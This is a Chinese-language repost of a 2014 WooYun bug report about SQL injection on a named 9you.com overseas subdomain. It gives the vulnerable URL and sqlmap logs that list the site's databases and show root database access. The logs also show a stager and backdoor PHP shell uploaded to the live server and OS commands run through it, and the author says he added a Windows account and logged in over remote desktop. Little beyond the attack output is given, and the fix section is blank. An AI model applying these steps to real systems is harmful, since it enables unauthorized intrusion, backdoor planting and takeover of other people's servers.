记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

久游网某海外站点存在SQL注入

2014-10-22 21:55

一个很奇怪的国外分站点:http://pk.music.9you.com/

注入点:http://pk.ent.9you.com/front_aboutus.php?about_id=1



爆出的数据库:

code 区域
[00:21:35] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: PHP 5.4.22, Apache 2.4.7

back-end DBMS: MySQL 5.0

[00:21:35] [INFO] fetching database names

[00:21:35] [INFO] the SQL query used returns 10 entries

[00:21:35] [INFO] retrieved: information_schema

[00:21:35] [INFO] retrieved: gici

[00:21:35] [INFO] retrieved: gicicrm

[00:21:36] [INFO] retrieved: giciinfo

[00:21:36] [INFO] retrieved: giciinfotest

[00:21:36] [INFO] retrieved: jiexi

[00:21:36] [INFO] retrieved: mysql

[00:21:36] [INFO] retrieved: pb

[00:21:37] [INFO] retrieved: pbtest

[00:21:37] [INFO] retrieved: test

available databases [10]:

[*] gici

[*] gicicrm

[*] giciinfo

[*] giciinfotest

[*] information_schema

[*] jiexi

[*] mysql

[*] pb

[*] pbtest

[*] test





数据库帐号是ROOT

code 区域
database management system users [2]:                                                                                                                                  

[*] 'root'@'localhost'

[*] 'webadmin'@'127.0.0.1'





直接可以shell执行命令,可以添加net user

code 区域
which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

>

[00:27:18] [INFO] retrieved the web server document root: 'F:\'

[00:27:18] [INFO] retrieved web server absolute paths: 'F:/xampp/htdocs/gici/front_aboutus.php'

[00:27:18] [INFO] trying to upload the file stager on '/' via LIMIT 'LINES TERMINATED BY' method

[00:27:19] [WARNING] unable to upload the file stager on '/'

[00:27:19] [INFO] trying to upload the file stager on '/' via UNION method

[00:27:19] [WARNING] expect junk characters inside the file as a leftover from UNION query

[00:27:19] [INFO] the remote file F://tmpuvlhf.php is larger than the local file /tmp/tmpAjQmTA

[00:27:19] [INFO] trying to upload the file stager on '/xampp/htdocs/gici' via LIMIT 'LINES TERMINATED BY' method

[00:27:20] [WARNING] unable to upload the file stager on '/xampp/htdocs/gici'

[00:27:20] [INFO] trying to upload the file stager on '/xampp/htdocs/gici' via UNION method

[00:27:20] [INFO] the remote file F:/xampp/htdocs/gici/tmpuvlhf.php is larger than the local file /tmp/tmpabAlC4

[00:27:20] [INFO] heuristics detected web page charset 'ascii'

[00:27:20] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/gici' - http://pk.ent.9you.com:80/tmpuvlhf.php

[00:27:21] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/gici' - http://pk.ent.9you.com:80/tmpbvsrp.php

[00:27:21] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> ipconfig

do you want to retrieve the command standard output? [Y/n/a] y

[00:27:50] [INFO] heuristics detected web page charset 'GB2312'

command standard output:

---



Windows IP Configuration





Ethernet adapter 本地连接:



Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 222.73.249.20

Subnet Mask . . . . . . . . . . . : 255.255.255.128

Default Gateway . . . . . . . . . : 222.73.249.126

漏洞证明:

3389远程也是对外开放的,直接添加帐号远程登录了。。。。

1.jpg

修复方案:

这个。。。


知识来源: www.wooyun.org/bugs/wooyun-2014-075318

阅读:164799 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“久游网某海外站点存在SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云